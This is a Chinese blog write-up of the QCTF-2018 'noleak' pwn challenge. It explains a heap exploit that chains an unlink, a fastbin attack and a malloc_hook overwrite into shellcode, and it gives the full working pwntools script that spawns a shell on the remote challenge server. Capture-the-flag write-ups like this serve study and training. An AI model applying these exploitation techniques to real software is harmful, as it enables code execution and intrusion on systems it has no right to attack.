[XCTF-pwn] 26_xctf-4th-QCTF-2018_noleak

最新推荐文章于 2023-12-14 11:36:46 发布
最新推荐文章于 2023-12-14 11:36:46 发布
阅读量208 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123350867
版权

程序有add,edit,free没有show,pie未开,bss可写执行,有写溢出漏洞和UAF漏洞,unlink+fastbin attack,无需泄露地址。

解题思路:

  1. 先建0x28,0x80,0x10块,利用写溢出在释放1块时进行unlink控制指针区;
  2. 由于free时不清指针,且仅允许建9块,在控制指针区后清指针,保留控制指针的指针;并预留shellcode
  3. 建0x10,0x60,0x10在原unsort位置,释放0x60块后通过写溢出修改0x60的头为0x91再释放在0x60的fd位置得到main_arena的指针;
  4. 将指针尾字节改为0x05(利用针位在malloc_hook前指0x7f);
  5. 建0x60的块两次将块建到malloc_hook附近;
  6. 通过将malloc_hook附近的指针尾字节改为0x10,控制malloc_hook写入指向shellcode的指针;
  7. 再建块时调用shellcode得到shell

完整exp:

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('111.200.241.244', 57362) 

libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

menu = b"Your choice :"
def add(size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"Size: ", str(size).encode())
    p.sendafter(b"Data: ", msg)

def free(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"Index: ", str(idx).encode())

def edit(idx, msg):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(len(msg)).encode())
    p.sendafter(b"Data: ", msg)

add(0x28, b'A')
add(0x80, b'A')
add(0x10, b'A')
add(0x10, b'A')
add(0x10, b'A')
buf = 0x601040
edit(0, flat(0,0x21, buf-0x18, buf-0x10, 0x20, 0x90))
free(1)
edit(0, p64(0)*3+p64(buf+8)+p64(0)*9+ asm(shellcraft.sh()))

add(0x10, b'1')
add(0x60, b'2')
add(0x10, b'3')
free(2)
edit(1, b'A'*0x18+p8(0x91))
free(2)
edit(1, b'A'*0x18+p64(0x71)+b'\x05')
add(0x68, b'4')
add(0x68, b'A')
edit(0, p64(0)*4+p8(0x10))
edit(5, p64(buf+0x50))

p.sendlineafter(menu, b'1')
p.sendlineafter(b"Size: ", b'1')

p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-PWN进阶区-Noleak(XCTF 4th-QCTF-2018)
weixin_44145820的博客
03-01 853
本题主要考察对堆的利用,需要有一定的背景知识,本文也参考了几篇大佬的Writeup,让本文尽可能详细。 题目分析 checksec: 本题的RELRO是完全开启的,意味着我们不能通过修改GOT表来进行攻击 以下是源代码: main函数 delete函数: 这里可以看到free之后没有把指针置空,可能有UAF或者Dubble Free edit函数: 在本函数中,没有检测大小就直接写入,明显...
No leak XCTF 4th-QCTF-2018
qq_41071646的博客
07-25 644
这个题真的很好玩 先看一下保护 PIE 和 NX没开 那么我们可以 用shellcode 来写这一道题 先用ida 看一下题目 会发现 没有show 也就是输出函数 但是 dele 函数确实能够 安排很多东西 UAF 等等 而且我们发现 edit 可以自己定size 那么 就可以堆溢出 但是有一点就是 由于指针没有清0 如果我们不自己清0...
XCTF 4th-QCTF-2018——Noleak分析
Eagle_hwei的博客
02-14 598
Noleak的题目分析 2020-02-1321:52:33 by hawkJW 题目附件、ida文件及wp链接   这道题考察的比较综合,设置到方方面面的知识点,这里记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看到,RELRO保护全开,则没有办法修改got表了,同时开启了Canary保护,栈溢出可能也有一定困难;但是我们看到,有NX没有开启,...
在不知道libc的情况下getshell&&qctf_2018_noleak
azraelxuemo的博客
04-02 264
文章目录qctf_2018_noleak题目分析deleteeditcheckSec攻击思路考虑怎么把堆地址尽量靠近malloc_hook如何把main_arena地址写进去修改为malloc_hook修改malloc_hook为我们bss地址并填入shellcodegetshellallpayload 这个题也真是开了眼了,完全就不知道libc,但最后也是打出来了 qctf_2018_noleak qctf_2018_noleak 题目分析 delete 没有清空 edit 随便堆溢出 checkSe
dice_game XCTF 4th-QCTF-2018
qq_41071646的博客
04-27 1077
其实感觉这个题 不算是pwn题。。。 这 pwn 里面就是 读取flag 文件 然后我们看一下 sub_a20 这个函数 随机数啊 本来我没有想用 把种子给 覆盖掉 但是 time(0) 感觉不稳 时间一万一不对劲 那么随机数 也会出错 所以干脆 把种子固定下来 下面是 exp #coding:utf-8 from pwn import* list...
XCTF-HW-pipeline附件
11-09
附件
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
(BUUCTF)qctf_2018_noleak
最新发布
xy1458214551的博客
12-14 39
BUUCTF上的qctf_2018_noleak题解
攻防世界进阶noleak
qq_42728977的博客
04-07 392
题目:XCTF 4th-QCTF-2018 noleak 难度:**** 漏洞点:UAF \unsorted bin sttack\partial write bypass PIE\unlink 参考链接: 伪造堆块绕过unlink检查(ctf-QiangWangCup-2015-shellman) 攻防世界PWN之Noleak(一题学了好多知识)题解 ctfwiki CTF pwn 中最通俗易懂...
XCTF 4th-QCTF-2018 babyheap
qq_41071646的博客
07-28 1832
这几天做pwn题做的很恶心了,,等下个星期想去继续肝内核pwn。。 先看一下这个题目的保护 基本该有的保护都有了 然后先看一下这个题 ida里面分析 发现了 程序没有给我们堆块修改的功能 这里可以通过 堆块合并 /重叠 然后申请达到修改堆块还有泄露堆块的目的 这里我们发现了 off by null 然后这里的思路 exp 来源于 https://www.xct...
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3410
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
攻防世界-Web-lottery(.git泄露、php源码审计、弱类型利用)-XCTF 4th-QCTF-2018
Sea_Sand息禅
04-26 4514
扫描目录,发现.git泄露: 提取.git泄露的源码,得到许多文件: 网站这里: 应该是买到手之后就能拿到flag,如果是这个flag就在.git里,那就好办了,尝试配合grep命令在这些文件中查找flag,并没有结果,要想有钱买flag,首页就给我们提供了一个方法: 买彩票猜数就行了,但是怎么能猜对?这就要审计一下代码,找找漏洞了。 经过一番审计,猜数字对应的函数在api.ph...
[BUUCTF-pwn] shanghai2019_slient_note
weixin_52640415的博客
02-02 437
没有show,没开PIE,got表可写,估计就是控制got表。 只能add两个块,一个是0x28,另一个是0x208。BUU上给的是ubuntu18,没有次数限制,也不删指针明显的UAF。add时用的calloc 。 但是一是没有show,要得到libc需要控制got表,而add时用的calloc不仅会清残留还不用libc-2.27的tcache。这样如果用fastbin attack需要找一个0x3X的标记或者0x21X显示这两个都找不着。 于是想到用unlink,这个不需要标记然后控制指针区后就可
BUUCTF:[QCTF2018]X-man-A face
末初的CSDN博客
11-19 1085
https://buuoj.cn/challenges#[QCTF2018]X-man-A%20face 缺少两个定位点,PS补一下 但是不知道为啥补出来的,QR Research扫不出来,用手机微信就可以扫出来 KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I= base32的特征 >>> import base64 >>> base64.b32decode('KFBVIRT3KBZ
QCTF 2018xman夏令营选拔赛
Xi4or0uji
07-15 2182
小肉鸡太菜了,就只做了三题orz....... x-man-a-face 这题挺简单的,拿到一个图片,看见有个二维码 发现少了两个定位点,用photoshop补全 扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I= 然后base32解码就行了 Lottery 这题是弱类型匹配,进...
2022强网拟态pwn wp
weixin_51480590的博客
11-18 502
这次比赛本人并没有参加,然后听说这次比赛比较简单,所以最近抽时间复现一波。由于本人web不太好,也并未涉及过webpwn,遂只复现mimic以及vm和两道堆题。
[pwn] -常见报错
s11show_163的博客
04-16 391
源代码: ##!/usr/bin/env python from pwn import * sh = process('./ret2text') target = 0x804863a sh.sendline('A' * (0x6c+4) + p32(target)) sh.interactive() .解决办法:pip install pwntools 参考链接:https://ww...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值